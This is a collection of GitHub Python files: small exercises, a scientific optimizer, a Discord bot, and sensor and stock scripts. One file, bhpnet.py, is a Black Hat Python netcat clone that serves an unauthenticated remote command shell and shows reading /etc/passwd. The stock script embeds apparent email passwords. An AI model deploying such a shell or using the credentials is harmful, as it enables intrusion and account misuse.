+{"seq_id":"32411950700","text":"# Calculates the factorial of num\ndef factorial(num):\n product = 1\n for n in range(2, num + 1):\n product *= n\n return product\n\nnumber = int(input('Skriv ett tal: '))\n\nprint(f'{number}! = {factorial(number)}')\n ","repo_name":"pacive/DI2006","sub_path":"11_as2/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73421503148","text":"#basic calculator v.2.1 - created by cryptomancery spring 2021\n#create variable for add\ndef add():\n while true:\n print(x + y)\n#create a variable for subtract\ndef subtract():\n while true:\n print(x - y)\n#create a variable for multiply\ndef multiply():\n while true:\n print(x * y)\n#create a variable for divide\ndef divide():\n while true:\n print(x // y)\n \n#create a variable for arithmetic\nfoo = add, subtract, multiply, divide\n#create and integer variable for x\nx = 0\n#create an integer variable for y\ny = 0\n\n#ask the user which form of arithmetic\nfoo = input(\"Lowercase only. Add, subtract, multiply, or divide? 
\")\n#ask the user \"X: \" and put answer in x\nx = input(\"X: \")\n#ask the user \"Y: \" and put answer in y\ny = input(\"Y: \")\n\n#convert x to integer\nx = int(x)\n#convert y to integer\ny = int(y)\n\n#if add\nif foo == 'add':\n print(x + y)\n#if subtract\nif foo == 'subtract':\n print(x - y)\n#if multiply\nif foo == 'multiply':\n print(x * y)\n#if divide\nif foo =='divide':\n print(x // y)\n\n","repo_name":"cryptomancery/Simple-Python-Calculator","sub_path":"PyCalculator.py","file_name":"PyCalculator.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12408400609","text":"import pygame\nfrom constants import *\n\nclass SelectionRect(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n self.start_pos = (0, 0)\n self.image = pygame.Surface((0, 0))\n self.rect = self.image.get_rect()\n\n def update(self, start_pos, end_pos):\n self.start_pos = start_pos\n self.image = pygame.Surface((WIDTH_RATIO * abs(end_pos[0] - start_pos[0]), HEIGHT_RATIO * abs(end_pos[1] - start_pos[1])))\n self.rect = self.image.get_rect()\n self.rect.x = WIDTH_RATIO * min(start_pos[0], end_pos[0])\n self.rect.y = HEIGHT_RATIO * min(start_pos[1], end_pos[1])\n\n def update_end_pos(self, end_pos):\n self.update(self.start_pos, end_pos)\n","repo_name":"Aurigami/rts","sub_path":"SelectionRect.py","file_name":"SelectionRect.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10410101821","text":"import logging\nfrom typing import Callable, Iterable, Union\nfrom warnings import warn\n\nfrom ..engine import Engine, SingleCoreEngine\nfrom ..history import HistoryOptions\nfrom ..problem import Problem\nfrom ..result import Result\nfrom ..startpoint import StartpointMethod, to_startpoint_method, uniform\nfrom ..store import autosave\nfrom .optimizer import Optimizer, ScipyOptimizer\nfrom .options import OptimizeOptions\nfrom .task import OptimizerTask\nfrom .util import (\n assign_ids,\n bound_n_starts_from_env,\n postprocess_hdf5_history,\n preprocess_hdf5_history,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef minimize(\n problem: Problem,\n optimizer: Optimizer = None,\n n_starts: int = 100,\n ids: Iterable[str] = None,\n startpoint_method: Union[StartpointMethod, Callable, bool] = None,\n result: Result = None,\n engine: Engine = None,\n progress_bar: bool = True,\n options: OptimizeOptions = None,\n history_options: HistoryOptions = None,\n filename: Union[str, Callable, None] = None,\n overwrite: bool = False,\n) -> Result:\n \"\"\"\n Do multistart optimization.\n\n Parameters\n ----------\n problem:\n The problem to be solved.\n optimizer:\n The optimizer to be used n_starts times.\n n_starts:\n Number of starts of the optimizer.\n ids:\n Ids assigned to the startpoints.\n startpoint_method:\n Method for how to choose start points. False means the optimizer does\n not require start points, e.g. for the 'PyswarmOptimizer'.\n **Deprecated. Use ``problem.startpoint_method`` instead.**\n result:\n A result object to append the optimization results to. For example,\n one might append more runs to a previous optimization. If None,\n a new object is created.\n engine:\n Parallelization engine. 
Defaults to sequential execution on a\n SingleCoreEngine.\n progress_bar:\n Whether to display a progress bar.\n options:\n Various options applied to the multistart optimization.\n history_options:\n Optimizer history options.\n filename:\n Name of the hdf5 file, where the result will be saved. Default is\n None, which deactivates automatic saving. If set to\n \"Auto\" it will automatically generate a file named\n `year_month_day_profiling_result.hdf5`.\n Optionally a method, see docs for `pypesto.store.auto.autosave`.\n overwrite:\n Whether to overwrite `result/optimization` in the autosave file\n if it already exists.\n\n Returns\n -------\n result:\n Result object containing the results of all multistarts in\n `result.optimize_result`.\n \"\"\"\n # optimizer\n if optimizer is None:\n optimizer = ScipyOptimizer()\n\n # number of starts\n n_starts = bound_n_starts_from_env(n_starts)\n\n # startpoint method\n if startpoint_method is None:\n if problem.startpoint_method is None:\n startpoint_method = uniform\n else:\n startpoint_method = problem.startpoint_method\n else:\n warn(\n \"Passing `startpoint_method` directly is deprecated, use `problem.startpoint_method` instead.\",\n DeprecationWarning,\n )\n\n # convert startpoint method to class instance\n startpoint_method = to_startpoint_method(startpoint_method)\n\n # check options\n if options is None:\n options = OptimizeOptions()\n options = OptimizeOptions.assert_instance(options)\n\n # history options\n if history_options is None:\n history_options = HistoryOptions()\n history_options = HistoryOptions.assert_instance(history_options)\n\n # assign startpoints\n startpoints = startpoint_method(\n n_starts=n_starts,\n problem=problem,\n )\n\n ids = assign_ids(\n n_starts=n_starts,\n ids=ids,\n result=result,\n )\n\n # prepare result\n if result is None:\n result = Result(problem)\n\n # engine\n if engine is None:\n engine = SingleCoreEngine()\n\n # change to one hdf5 storage file per start if parallel and if hdf5\n history_file = history_options.storage_file\n history_requires_postprocessing = preprocess_hdf5_history(\n history_options, engine\n )\n\n # define tasks\n tasks = []\n for startpoint, id in zip(startpoints, ids):\n task = OptimizerTask(\n optimizer=optimizer,\n problem=problem,\n x0=startpoint,\n id=id,\n history_options=history_options,\n optimize_options=options,\n )\n tasks.append(task)\n\n # perform multistart optimization\n ret = engine.execute(tasks, progress_bar=progress_bar)\n\n # merge hdf5 history files\n if history_requires_postprocessing:\n postprocess_hdf5_history(ret, history_file, history_options)\n\n # aggregate results\n for optimizer_result in ret:\n result.optimize_result.append(optimizer_result)\n\n # sort by best fval\n result.optimize_result.sort()\n\n # if history file provided, set storage file to that one\n if filename == \"Auto\" and history_file is not None:\n filename = history_file\n autosave(\n filename=filename,\n result=result,\n store_type=\"optimize\",\n overwrite=overwrite,\n )\n\n return result\n","repo_name":"ICB-DCM/pyPESTO","sub_path":"pypesto/optimize/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"37"} +{"seq_id":"1366714568","text":"import discord\r\nfrom discord.ext import commands\r\nimport youtube_dl\r\nimport nacl\r\nimport ffmpeg\r\n\r\nclass music(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.command()\r\n 
async def play(self, ctx, *url):\r\n #If no author, send warning\r\n if ctx.author.voice is None:\r\n await ctx.send(\"T'es pas dans un channel\")\r\n\r\n #Store the voice channel\r\n voice_channel = ctx.author.voice.channel\r\n\r\n #If bot is not in a voice channel, wait until connected\r\n #else move to the correct voice channel (switching channels)\r\n if ctx.voice_client is None:\r\n await voice_channel.connect()\r\n else:\r\n await ctx.voice_client.move_to(voice_channel)\r\n\r\n ctx.voice_client.stop()\r\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\r\n YDL_OPTIONS = {\"format\":\"bestaudio\"}\r\n vc = ctx.voice_client\r\n\r\n if \".com\" in url:\r\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\r\n info = ydl.extract_info(url, download=False)\r\n url2 = info['formats'][0]['url']\r\n source = await discord.FFmpegOpusAudio.from_probe(url2, executable=r\"C:###\\youtube-dl\\ffmpeg.exe\")\r\n await ctx.channel.send(\"Playing ton beat de merde\")\r\n vc.play(source)\r\n\r\n else:\r\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\r\n info = ydl.extract_info(f\"ytsearch:{url}\", download=False)\r\n print(info)\r\n print(info['entries'][0])\r\n urlx = info['entries'][0]\r\n url2 = urlx['formats'][0]['url']\r\n source = await discord.FFmpegOpusAudio.from_probe(url2,executable=r\"C:###\\youtube-dl\\ffmpeg.exe\")\r\n await ctx.channel.send(f\"Playing: {urlx['title']}\")\r\n vc.play(source)\r\n\r\n @commands.command()\r\n async def pause(self, ctx):\r\n ctx.voice_client.pause()\r\n await ctx.send(\"J'ai pause ton beat\")\r\n\r\n @commands.command()\r\n async def resume(self, ctx):\r\n ctx.voice_client.resume()\r\n await ctx.send(\"J'ai resume ton beat\")\r\n\r\n###################################################################################\r\n\r\ndef setup(client):\r\n client.add_cog(music(client))\r\n\r\n","repo_name":"haddad-github/DiscordBot-Public","sub_path":"cogs/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72510462186","text":"AUDIO_DIRECTORY = \"/home/root/fasit/sounds/\"\n\nimport fasit_audio\n\nfrom threading import BoundedSemaphore\nimport time\nimport os\nimport random\nimport logging\n\nfrom QThread import *\n\n#------------------------------------------------------------------------------\n#\n#------------------------------------------------------------------------------\nclass play_sound_thread(QThread): \n \"\"\"Class for playing sounds\n \"\"\" \n def __init__(self, number):\n QThread.__init__(self)\n logger_string = \"play_sound_thread\" + str(number)\n self.logger = logging.getLogger(logger_string)\n self.keep_going = True\n self.track_number = -1\n self.track_path = \"\"\n self.loop = 1\n self.random = False\n self.playing = False\n self.playing_semaphore = BoundedSemaphore(1)\n self.track_semaphore = BoundedSemaphore(1)\n self.audio = fasit_audio.FasitAudio()\n self.start()\n\n def get_track(self):\n self.track_semaphore.acquire()\n path = self.track_path\n self.track_semaphore.release() \n return path\n\n def set_track(self, path):\n self.track_semaphore.acquire()\n self.track_path = path\n self.track_semaphore.release() \n \n def is_playing(self):\n self.playing_semaphore.acquire()\n playing = self.playing\n self.playing_semaphore.release() \n return playing\n \n def set_playing(self, playing):\n self.playing_semaphore.acquire()\n self.playing = playing\n 
self.playing_semaphore.release() \n \n def record_track(self, track_number):\n if (self.is_playing() == True):\n self.logger.debug(\"Can't record track, player is currently playing.\")\n return False\n if ((track_number < 0) or (track_number > 62)):\n self.logger.debug('Track number out of range [0 - 62]: %d', track_number)\n return False\n \n self.set_track(AUDIO_DIRECTORY+str(track_number)+\".mp3\")\n if (os.path.isfile(self.get_track()) == True):\n self.logger.debug('Recording file %s', self.get_track())\n self.set_playing(True)\n self.track_number = track_number\n self.loop = 0\n self.random = False\n if (self.random == True):\n self.loop = 1\n self.write(\"record\")\n return True\n else:\n self.logger.debug('Could not find file %s', self.get_track())\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n return False\n\n def play_track(self, track_number, loop = 1, random = False):\n if (self.is_playing() == True):\n self.logger.debug(\"Can't play track, player is currently playing.\")\n return False\n if ((track_number < 0) or (track_number > 62)):\n self.logger.debug('Track number out of range [0 - 62]: %d', track_number)\n return False\n if ((loop < 0) or (loop > 255)):\n self.logger.debug('loop out of range [0 - 255]: %d', loop)\n return False\n if ((random != True) and (random != False)):\n self.logger.debug('random out of range [True or False]: %d', random)\n return False\n \n self.set_track(AUDIO_DIRECTORY+str(track_number)+\".mp3\")\n if (os.path.isfile(self.get_track()) == True):\n self.logger.debug('Playing file %s', self.get_track())\n self.set_playing(True)\n self.track_number = track_number\n self.loop = loop\n self.random = random\n if (self.random == True):\n self.loop = 1\n self.write(\"play\")\n return True\n else:\n self.logger.debug('Could not find file %s', self.get_track())\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n return False\n \n def run(self):\n self.logger.debug('Starting audio thread...')\n while (self.keep_going == True):\n data = self.read_in()\n #self.logger.debug('Going with %s and %s', `data`, self.get_track())\n if (data == \"play\"):\n path = self.get_track()\n if (path != \"\"):\n self.audio.play(path, self.loop)\n if(self.audio.poll() == True):\n self.logger.debug('Track has stopped playing: %s', path)\n if (self.random == True):\n wait = random.randint(1, 10)\n time.sleep(wait)\n self.audio.play(path, self.loop)\n else:\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n if (data == \"record\"):\n path = self.get_track()\n if (path != \"\"):\n self.audio.record(path)\n self.logger.debug('Track has stopped recording: %s', path)\n self.track_number = -1\n self.set_track(\"\")\n self.loop = 1\n self.random = False\n elif data == \"stop_play\":\n self.random = False\n self.audio.stop()\n elif data == \"stop\":\n self.keep_going = False\n time.sleep(0.5)\n self.set_playing(False)\n\n\n","repo_name":"fishybell/ATIatm","sub_path":"open_embedded_stable_ati/oe_at91sam/recipes/ati2/files/fasit/play_sound_thread.py","file_name":"play_sound_thread.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5899181642","text":"# Black Hat Python page 13\n# Replacing Netcat - BHP Net Tool\n\nimport getopt\nimport socket\nimport subprocess\nimport sys\nimport threading\n\n# global variables\nlisten = False\ncommand = False # True if server is executing a 
command shell\nupload = False\nexecute = \"\"\ntarget = \"\"\nupload_destination = \"\"\nport = 0\n\n\n# TODO convert to argparse instead of getopt\ndef usage():\n print(\"BHP Net Tool\")\n print()\n print(\"Usage: bhpnet.py -t target_host -p port\")\n print(\"-l --listen\t\t\t\t- listen on [host]:[port] for incoming connections\")\n print(\"-e --execute=file_to_run - execute the given file upon receiving a connection\")\n print(\"-c --command\t\t\t\t- initialize a command shell\")\n print(\"-u --upload=destination\t- upon receiving connection upload a file and write to [destination]\")\n print()\n print()\n print(\"Examples:\")\n print(\"bhpnet.py -t 192.168.0.1 -p 5555 -l -c\")\n print(\"bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\\\target.exe\")\n print(\"bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\\\"cat /etc/passwd\\\"\")\n print(\"echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135\")\n sys.exit(0)\n\n\ndef client_sender(buffer):\n print(\"[*] Creating socket\")\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"[*] Socket created\")\n\n try:\n # connect to target host\n client.connect((target, port))\n\n print(\"[*] Client connected\")\n\n if len(buffer) and not command:\n client.sendall(buffer.encode('utf-8')) # TODO send or sendall?\n print(\" Sent an initial buffer in client_sender:\", buffer, \" Length is:\", len(buffer))\n\n\n\n while True:\n\n # wait for data back\n recv_len = 1\n response = \"\"\n\n while recv_len:\n\n print(\" Receiving data.\")\n data = client.recv(4096).decode('utf-8')\n # data2 = client.recv(4096).decode('utf-8')\n # print(\" data:\", data)\n # print(\" data2:\", data2)\n\n recv_len = len(data)\n # recv_len = len(data) + len(data2)\n response += data\n # response += data2\n # print(\" response:\", response)\n\n if recv_len < 4096:\n # print(\" Breaking out of recv loop. recv_len:\", recv_len)\n break\n\n\n\n # print(\" Printing response and reading from stdin.\")\n print(response, end='') # remove the \\n that print() adds\n\n # wait for more input\n buffer = input(\"\") # was raw_input() in Python 2 TODO this acts weird...\n # buffer = sys.stdin.readline() # includes a '\\n' at the end\n # TODO needed?: buffer += \"\\n\"\n buffer += \"\\n\"\n\n # send it off\n # print(\" client.send\")\n client.sendall(buffer.encode('utf-8')) # TODO send or sendall?\n\n except Exception as e:\n print(\"[*] Exception! 
Exiting.\", e)\n client.close()\n\n\ndef server_loop():\n global target\n\n # if no target is defined, listen on all interfaces\n if not len(target):\n target = \"0.0.0.0\"\n\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((target, port))\n server.listen(5)\n\n while True:\n print(\"[*] Server listening\")\n client_socket, addr = server.accept()\n print(\"[*] Client connected\")\n\n # spin off thread to handle client\n client_thread = threading.Thread(target=client_handler, args=(client_socket,))\n client_thread.start()\n\n # print(\"[*] Client handler thread started\") # prints after the thread prints...\n\n\ndef run_command(command):\n # trim newline\n command = command.rstrip()\n\n # run the command and get output back\n try:\n output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)\n except:\n output = \"Failed to execute the command.\\r\\n\"\n\n return output\n\n\ndef client_handler(client_socket):\n global upload\n global execute\n global command\n\n print(' Starting client_handler')\n\n # check for upload\n if len(upload_destination):\n # read in all of the bytes and write to our destination\n file_buffer = \"\"\n\n # keep reading data until none is available\n while True:\n print(' Handling upload. Waiting on socket recv...')\n data = client_socket.recv(1024).decode('utf-8')\n\n if not data:\n print(' Handling upload. No data, breaking out of recv loop.')\n break\n else:\n file_buffer += data\n\n try:\n file_descriptor = open(upload_destination, \"wb\")\n file_descriptor.write(file_buffer)\n file_descriptor.close()\n\n\n\n # acknowledge that we wrote the file out\n print(\" client_socket.send\")\n client_socket.sendall((\"Successfully saved file to %s\\r\\n\" % upload_destination).encode('utf-8'))\n\n except:\n print(\" client_socket.send - Failed to save file\")\n client_socket.sendall((\"Failed to save file to %s\\r\\n\" % upload_destination).encode('utf-8'))\n\n if len(execute):\n # run the command\n output = run_command(execute)\n\n print(\" client_socket.send\")\n client_socket.sendall(output.encode('utf-8')) # TODO send or sendall?\n\n if command:\n print(\" Seeding command loop with prompt sendall\")\n client_socket.sendall(\" \".encode('utf-8')) # TODO Added here to 'seed' loop. send or sendall?\n while True:\n print(\" In command loop.\") # Sending prompt.\")\n # show simple command prompt\n # client_socket.sendall(\" \".encode('utf-8')) # TODO send or sendall?\n\n # receive until we see a linefeed\n cmd_buffer = \"\"\n while \"\\n\" not in cmd_buffer:\n print(\" Looping client_socket.recv until \\\\n found\")\n len_before = len(cmd_buffer)\n cmd_buffer += client_socket.recv(1024).decode('utf-8')\n print(cmd_buffer)\n\n if len_before == len(cmd_buffer):\n print(\" No more data. Connection is broken. Ending thread by returning.\")\n return\n\n # send back the command output\n response = run_command(cmd_buffer)\n\n if not response:\n response = \"\".encode('utf-8') # or = b''?\n\n # TODO test the string encoding... sometimes the response is bytes or str\n # fixed the type test by using type()\n if type(response) is str:\n # client_socket.re\n response = response.encode('utf-8')\n print(\"Response, length, type\")\n print(response)\n print(len(response))\n print(type(response))\n\n if type(response) is not bytes:\n print('response is still not bytes... 
wtf?!?!?!')\n print('fixing it')\n response = b''\n\n # send back the response\n print(\" Sending response.\")\n client_socket.sendall(response + \" \".encode('utf-8')) # TODO send or sendall?\n\n # TODO Adding handler for stdin/stdout... why is this not already included? telnet-like functionality\n\n # while True:\n # print(' Handling stdout.')\n #\n # # wait for data back\n # recv_len = 1\n # response = \"\"\n #\n # while recv_len:\n #\n # print(\" Receiving data.\")\n # data = client_socket.recv(4096).decode('utf-8')\n # recv_len = len(data)\n # response += data\n #\n # if recv_len < 4096:\n # break\n # print(\"\")\n # print(response)\n #\n # # wait for more input\n # print(' waiting on stdin.')\n # # buffer = input(\"\") # was raw_input() in Python 2 TODO this acts weird...\n # buffer = sys.stdin.readline() # TODO read or readline\n # # TODO needed?: buffer += \"\\n\"\n #\n # print(' Sending input.')\n # # send it off\n # client_socket.send(buffer.encode('utf-8'))\n #\n # print(' Exiting client_handler')\n\n\n# TODO refactor to remove global variables\ndef main():\n global listen\n global port\n global execute\n global command\n global upload_destination\n global target\n\n if not len(sys.argv[1:]):\n usage()\n\n # read the commandline options\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hle:t:p:cu:\",\n [\"help\", \"listen\", \"execute\", \"target\", \"port\", \"command\", \"upload\"])\n except getopt.GetoptError as err:\n print(str(err))\n return\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n usage()\n elif o in (\"-l\", \"--listen\"):\n listen = True\n elif o in (\"-e\", \"--execute\"):\n execute = a\n elif o in (\"-c\", \"--commandshell\"):\n print(' Running as command shell.')\n command = True\n elif o in (\"-u\", \"--upload\"):\n upload_destination = a\n elif o in (\"-t\", \"--target\"):\n target = a\n elif o in (\"-p\", \"--port\"):\n port = int(a)\n else:\n raise Exception(\"Unhandled option\")\n\n # are we going to listen or just send data from stdin?\n if not listen and len(target) and port > 0:\n print(\"[*] Beginning client, reading stdin.\")\n\n # read in the buffer from the command line\n # this will block, send EOF (Ctrl-d on Linux, Ctrl-z on Windows)\n # if not sending input to stdin\n # TODO really needed? 
causes extra input when connecting to bhpnet command server.\n # buffer = sys.stdin.read() # TODO should it be read (original) or readline (with '\\n')?\n # buffer = input()\n buffer = ''\n\n # send data off\n print(\"[*] Starting client_sender with stdin buffer.\")\n client_sender(buffer)\n\n # listen and potentially upload, execute commands or drop a shell back\n # depending on command line options\n elif listen:\n server_loop()\n\n else:\n raise Exception(\"Invalid option\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"benhunter/py-stuff","sub_path":"bhp/bhpnet.py","file_name":"bhpnet.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19672799338","text":"from evdev import InputDevice, categorize, ecodes\nimport math\nimport numpy as np\nimport time\ndevice1 = InputDevice('/dev/input/event0')\ndevice2 = InputDevice('/dev/input/event3')\n\n\n# 2 has to be right, 1 has to be left.\n\ndpcy1 = 1945.39008\ndpcy2 = 2021.565\ndpcx1 = 1963.033\ndpcx2 = 2024.287\nX, Y , Theta = 0,0,0\nD = 8.1\ncount = 0\nmax_mov = 0\ntime_mean = 0\n\ntime_list = []\n\ntry:\n while True:\n s = time.time()\n count += 1\n \n event1 = device1.read_one()\n event2 = device2.read_one()\n x1_d, y1_d = 0, 0\n x2_d, y2_d = 0, 0\n if event1 is not None:\n if event1.type == ecodes.EV_REL:\n if event1.code == ecodes.REL_X:\n x1_d = event1.value\n elif event1.code == ecodes.REL_Y:\n y1_d = -event1.value\n if event2 is not None:\n if event2.type == ecodes.EV_REL:\n if event2.code == ecodes.REL_X:\n x2_d = event2.value\n elif event2.code == ecodes.REL_Y:\n y2_d = -event2.value\n \n max_mov = max(x1_d, y1_d, x2_d, y2_d,max_mov)\n #Converting to centimeters for First mouse\n x1_c = x1_d/dpcx1\n y1_c = y1_d/dpcy1\n \n #Converting to centimeters for Second mouse\n x2_c = x2_d/dpcx2\n y2_c = y2_d/dpcy2\n \n delta_x = (x1_c+x2_c)/2\n delta_y = (y1_c+y2_c)/2\n \n delta_theta = math.atan2(y1_c - y2_c, x1_c - x2_c + D)\n Theta += delta_theta\n \n delta_x_global = math.cos(Theta)*delta_x - math.sin(Theta)*delta_y\n delta_y_global = math.sin(Theta)*delta_x + math.cos(Theta)*delta_y\n \n X += delta_x_global\n Y += delta_y_global\n e = time.time()\n time_mean += (e-s)\n time_list.append(e-s)\n \n if count%50000==0:\n print(\"C:%d, X:%f, Y:%f, Theta:%f\\n\"%(count/50000 ,X, Y,math.degrees(Theta)))\n #print(\"x1d:%d, y1d:%f, x2d:%f, y2d:%f\\n\"%(x1_d, y1_d, x2_d, y2_d))\n #print(\"Maximum Movement:\",max_mov)\n #print(\"Standard Deviation:\", np.std(time_list))\n #print(\"Average time:\",time_mean/count)\n \n \n\nexcept KeyboardInterrupt:\n \n device1.close()\n device2.close()\n \n \n \n","repo_name":"PranavAdlinge/DeadReckoning","sub_path":"dr.py","file_name":"dr.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24360756651","text":"\n\"\"\"\n백준 온라인저지 (boj.kr)\n10866 덱\n정수를 저장하는 덱(Deque)를 구현한 다음, 입력으로 주어지는 명령을 처리하는 프로그램을 작성하시오.\n\n명령은 총 여덟 가지이다.\n\npush_front X: 정수 X를 덱의 앞에 넣는다.\npush_back X: 정수 X를 덱의 뒤에 넣는다.\npop_front: 덱의 가장 앞에 있는 수를 빼고, 그 수를 출력한다. 만약, 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\npop_back: 덱의 가장 뒤에 있는 수를 빼고, 그 수를 출력한다. 만약, 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\nsize: 덱에 들어있는 정수의 개수를 출력한다.\nempty: 덱이 비어있으면 1을, 아니면 0을 출력한다.\nfront: 덱의 가장 앞에 있는 정수를 출력한다. 만약 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\nback: 덱의 가장 뒤에 있는 정수를 출력한다. 
만약 덱에 들어있는 정수가 없는 경우에는 -1을 출력한다.\n\n\"\"\"\nfrom collections import deque\nimport sys\n\ncase = int(sys.stdin.readline().rstrip())\ncmdlist = []\nfor c in range(case) :\n cmdlist.append(sys.stdin.readline().rstrip())\n\nd = deque()\nfor idx,acmd in enumerate(cmdlist) :\n cmd = acmd.split(' ');\n if cmd[0] == 'push_back' :\n d.append(int(cmd[1]))\n elif cmd[0] == 'push_front' :\n d.appendleft(int(cmd[1]))\n elif cmd[0] == 'pop_back' :\n if d : print(d.pop())\n else : print(-1)\n elif cmd[0] == 'pop_front' :\n if d : print(d.popleft())\n else : print(-1) \n elif cmd[0] == 'front' :\n if d : print(d[0])\n else : print(-1)\n elif cmd[0] == 'back' :\n if d : print(d[-1])\n else : print(-1)\n elif cmd[0] == 'size' :\n print(len(d))\n elif cmd[0] == 'empty' :\n if len(d) == 0 : print(1)\n else : print(0)","repo_name":"csw180/coding_py","sub_path":"boj_10866.py","file_name":"boj_10866.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20621196495","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport random\nimport pandas as pd\nimport smtplib\nimport easyquotation\nimport datetime\nimport time\nfrom email.mime.text import MIMEText\nfrom pytdx.hq import TdxHq_API\nfrom email.header import Header\nimport traceback\napi = TdxHq_API(auto_retry=True)\nfrom util.TransBaseData import main\n#全局变量\ndict_code_ma = dict()\ndict_code_last_close = dict()\n\n#刷新本地数据\n#main()\n\n#存储已发送过股票的邮件次数\nsend_email_times = dict()\n\ndef get_format_day(numdays=0,sep = \"-\"):\n now = datetime.datetime.now()\n delta = datetime.timedelta(days=numdays)\n n_days = now + delta\n return n_days.strftime(\"%Y{}%m{}%d\".format(sep, sep))\n\ndef send_email(subject, text):\n mail_host = \"smtp.qq.com\" # 设置的邮件服务器host必须是发送邮箱的服务器,与接收邮箱无关。\n # mail_user = \"535085264@qq.com\" # qq邮箱登陆名\n # mail_pass = \"qkjncuveufokcbea\" # 开启stmp服务的时候并设置的授权码,注意!不是QQ密码。\n # sender = '535085264@qq.com' # 发送方qq邮箱\n # receivers = ['535085264@qq.com'] # 接收方qq邮箱\n qq_mail1 = \"535085264@qq.com\"\n mail_pass1 = \"qkjncuveufokcbea\"\n qq_mail2 = \"1328660440@qq.com\"\n mail_pass2 = \"tejexorxzankjgba\"\n mail_config_list = [(qq_mail1, mail_pass1, qq_mail1, qq_mail1), (qq_mail2, mail_pass2, qq_mail2, qq_mail2)]\n mail_user, mail_pass, sender, receivers = random.sample(mail_config_list, k=1)[0]\n message = MIMEText(text, 'plain', 'utf-8')\n message['From'] = Header(\"hailong\", 'utf-8') # 设置显示在邮件里的发件人\n message['To'] = Header(\"wowo\", 'utf-8') # 设置显示在邮件里的收件人\n message['Subject'] = Header(subject, 'utf-8') # 设置主题和格式\n try_time = 0\n try:\n #最多重试五次\n if try_time > 1:\n return\n smtpobj = smtplib.SMTP_SSL(mail_host, 465) # 本地如果有本地服务器,则用localhost ,默认端口25,腾讯的(端口465或587)\n smtpobj.set_debuglevel(1)\n smtpobj.login(mail_user, mail_pass) # 登陆QQ邮箱服务器\n smtpobj.sendmail(sender, receivers, message.as_string()) # 发送邮件\n print(\"邮件发送成功\")\n smtpobj.quit() # 退出\n except smtplib.SMTPException as e:\n print(\"Error:无法发送邮件\")\n try_time += 1\n print(e)\n\ndef get_history_data_pytdx(code, MA_DAY = 20, start = 1):\n\n #先查表\n if code in dict_code_ma.keys():\n ma = dict_code_ma[code]\n last_close = dict_code_last_close[code]\n return ma, last_close\n with api.connect('119.147.212.81', 7709):\n \"\"\"\n category: K线种类\n 0 5分钟K线 1 15分钟K线 2 30分钟K线 \n 3 1小时K线 4 日K线 5 周K线 6 月K线 \n 7 1分钟 8 1分钟K线 9 日K线 10 季K线 11 年K线\n market: 市场代码 0:深圳,1:上海\n stockcode: 证券代码\n start: 指定的范围开始位置 0表示当天\n count: 用户要请求的 K 线数目,最大值为 800\n \"\"\"\n if code[0] in ('0', '3'):\n 
